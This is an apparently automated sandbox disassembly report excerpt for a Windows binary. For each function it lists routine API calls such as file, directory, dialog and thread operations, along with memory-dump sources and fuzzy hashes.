Function 00007FF7E1DC2CE0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF7E1DC8C9A), ref: 00007FF7E1DC2D22
WriteFile.KERNEL32 ref: 00007FF7E1DC2D6C
WriteFile.KERNELBASE ref: 00007FF7E1DC2D9A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
Instruction ID: b47165199da1ae017189bcd83c12666f75c1c47a2edbea81bd4db5be1e11b34a
Opcode Fuzzy Hash: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
Instruction Fuzzy Hash: FE516C62B1864292FB10EB25D44677AA320FF94790FD44133EA4D07AD4DFBCE585C7A2

Function 00007FF7E1DE03E0 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextW.USER32 ref: 00007FF7E1DE0556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE05C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE05C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE05CD

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ItemText
String ID:
API String ID: 3750147219-0
Opcode ID: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
Instruction ID: 5f312dab9941ff0a686f1e2a9d303816dd7a346a449ac03acbbaab244557dea6
Opcode Fuzzy Hash: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
Instruction Fuzzy Hash: 6051E362F1465680FB04EBA4D8463ADA322AF45BA5FC08637DA1C567D9DFBCE440C362

Function 00007FF7E1DC3684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF7E1DC309D), ref: 00007FF7E1DC36CE
CreateDirectoryW.KERNEL32 ref: 00007FF7E1DC3733
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF7E1DC309D), ref: 00007FF7E1DC3791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC37CE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
Instruction ID: ab023a8921c360b63ebfc78d8ccea78312e98e6ee4afabcc4f38b1312b197f02
Opcode Fuzzy Hash: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
Instruction Fuzzy Hash: C631D522A0C68251EF60FB25A446379E351FF897A0FD04632EE9D836D4CFBCD445C652

Function 00007FF7E1DE2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7E1DE2D7B

Part of subcall function 00007FF7E1DE27FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7E1DE281E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7E1DE2D90
__scrt_release_startup_lock.LIBCMT ref: 00007FF7E1DE2DFE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7E1DE2E51

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction ID: dacb93139019ffd7e0070ff0f39b7b96302d00f15014b28d956a54d6e464f07e
Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction Fuzzy Hash: 53316921E0811242FB6CFB6494533B9A391AF41746FC48436EA0E8B2D7DEFCB5448273

Function 00007FF7E1DC2320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF7E1DC2927,?,00100000,?,00000001,00000000,00000000,?,00007FF7E1DC14C1), ref: 00007FF7E1DC2348
ReadFile.KERNELBASE ref: 00007FF7E1DC2367
GetLastError.KERNEL32 ref: 00007FF7E1DC239B
GetLastError.KERNEL32 ref: 00007FF7E1DC23BA

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: 1c1627b2d6be23228e8113a650a18fe3e3eb498410e59ab945f2ac29a7927b34
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: 27216221A0C55281EB60FF11A401339E3A0FB85B94F94493ADA5D4A688CFBDE995C7B3

Function 00007FF7E1DCE948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DCECD8: ResetEvent.KERNEL32 ref: 00007FF7E1DCECF1
Part of subcall function 00007FF7E1DCECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF7E1DCED07

ReleaseSemaphore.KERNEL32 ref: 00007FF7E1DCE974
FindCloseChangeNotification.KERNELBASE ref: 00007FF7E1DCE993
DeleteCriticalSection.KERNEL32 ref: 00007FF7E1DCE9AA
CloseHandle.KERNEL32 ref: 00007FF7E1DCE9B7

Part of subcall function 00007FF7E1DCEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA63
Part of subcall function 00007FF7E1DCEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA6E

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 2143293610-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: e4ffad7eb1e0d9e197a833013551e44412f57d4a5deebbbadd3e4be23caa3c03
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: A1012D32B14A91A2E758EB21E5457ADA720FB88B80F804132DB5D03625CF79E5F4C792

Function 00007FF7E1DCEAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF7E1DCEAE0
SetThreadPriority.KERNEL32 ref: 00007FF7E1DCEB36

Strings

CreateThread failed, xrefs: 00007FF7E1DCEAEE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: d5a9222637bef151a5ec8f9d731679fd57a557cc99ee55c96fe080bec1c3936f
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: 76116331A08A4291EB04EB10E8423BAF365FB84784F944633E68E06669DFBCE595C761

Function 00007FF7E1DD946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DCDFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF7E1DCDDDF

OleInitialize.OLE32 ref: 00007FF7E1DD9486
SHGetMalloc.SHELL32 ref: 00007FF7E1DD94D4

Strings

riched20.dll, xrefs: 00007FF7E1DD9475

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction ID: 23bf52e3b14848c42912b61a80f0437ce7344dfffdb9b95c3797f2d5cbaffbc4
Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction Fuzzy Hash: 06F03171A18A4182E701EF20F4162AAF3A0FB48755F840136F98D42654DFBCD159CB11

Function 00007FF7E1DD095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DD853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7E1DD856C

Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB67
Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB80

Part of subcall function 00007FF7E1DB1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1FFB

Part of subcall function 00007FF7E1DB129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DB1396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE01BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE01C1
SendDlgItemMessageW.USER32 ref: 00007FF7E1DE01F2

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
Instruction ID: 5e6ab58f7abd203e2690da29a1e6b5c63b4ce85eab43bee9b2f3df895ab62844
Opcode Fuzzy Hash: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
Instruction Fuzzy Hash: 4851C262F0464656EB04EBA5D4423FDA322AB89BC4F804637DE0D977D6DEBCD501C3A1

Function 00007FF7E1DC2134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7E1DC21CF
CreateFileW.KERNEL32 ref: 00007FF7E1DC223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC22D8

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
Instruction ID: 60961b6d60840c86b97c30cbad72ddf5e35a8206d4cd44f0944d6508a6e9d53c
Opcode Fuzzy Hash: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
Instruction Fuzzy Hash: B241C372A0868182EB14EB15E446769A3A1FB84BB4F904736DFAD03AD5CFBCE490C751

Function 00007FF7E1DB23F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF7E1DB243E
GetWindowTextW.USER32 ref: 00007FF7E1DB2476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB2505

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
Instruction ID: 3393d0600c876580a3b9b4c7231572afae32a823174f3bd028ff53a675559cb0
Opcode Fuzzy Hash: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
Instruction Fuzzy Hash: CF21C472A28B8181EB14EB25B84167AA360FB89BD0F544236FBDD03B95CF7CE190C741

Function 00007FF7E1DD1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E1DD205B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E1DD2077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E1DD2093

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
Instruction ID: 1b8e3bb6d47d030cc600171588e1d926f1a7eea2d4521f94be93059d6fd9117f
Opcode Fuzzy Hash: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
Instruction Fuzzy Hash: 3931A412E0869651FB24F714E4463B9E3A0FB50784F958133E28C065A9DFFCE986C313

Function 00007FF7E1DC3D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF7E1DD07E1), ref: 00007FF7E1DC3D5E
SetFileAttributesW.KERNEL32 ref: 00007FF7E1DC3DB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC3E1A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
Instruction ID: 0ebba20f80813bc0aaabf9cf53907a5106ed923171e2313a50457d0c948283c9
Opcode Fuzzy Hash: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
Instruction Fuzzy Hash: 9721FB22A1878141EF20EB29E446369A360FF88794F804232EA9D426D5EF7CD551C651

Function 00007FF7E1DC31BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF7E1DD0822), ref: 00007FF7E1DC31E7
DeleteFileW.KERNEL32 ref: 00007FF7E1DC3237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC32A1

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
Instruction ID: 4d01bc92fea40e3575509fc920be7510ce8f9fd79bb6ffd313420bdd7ae40092
Opcode Fuzzy Hash: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
Instruction Fuzzy Hash: B7212832A1878181EF10EB24F44632EE361FF88B94F900232EADE42A98DF7CD140C751

Function 00007FF7E1DC32BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF7E1DCE5B1,?,?,?,00000000,?), ref: 00007FF7E1DC32E7
GetFileAttributesW.KERNELBASE ref: 00007FF7E1DC3334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC3399

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
Instruction ID: 7ce9194d3e0f62e7daca931dc566b1e57284695249690d5b636d49180c57bec8
Opcode Fuzzy Hash: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
Instruction Fuzzy Hash: 4E21B832A1878181EB10EB19F446329E361FBC97A4F900632EA9D437D9DF7CD541CB51

Function 00007FF7E1DEBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7E1DEBF48), ref: 00007FF7E1DEBF8C
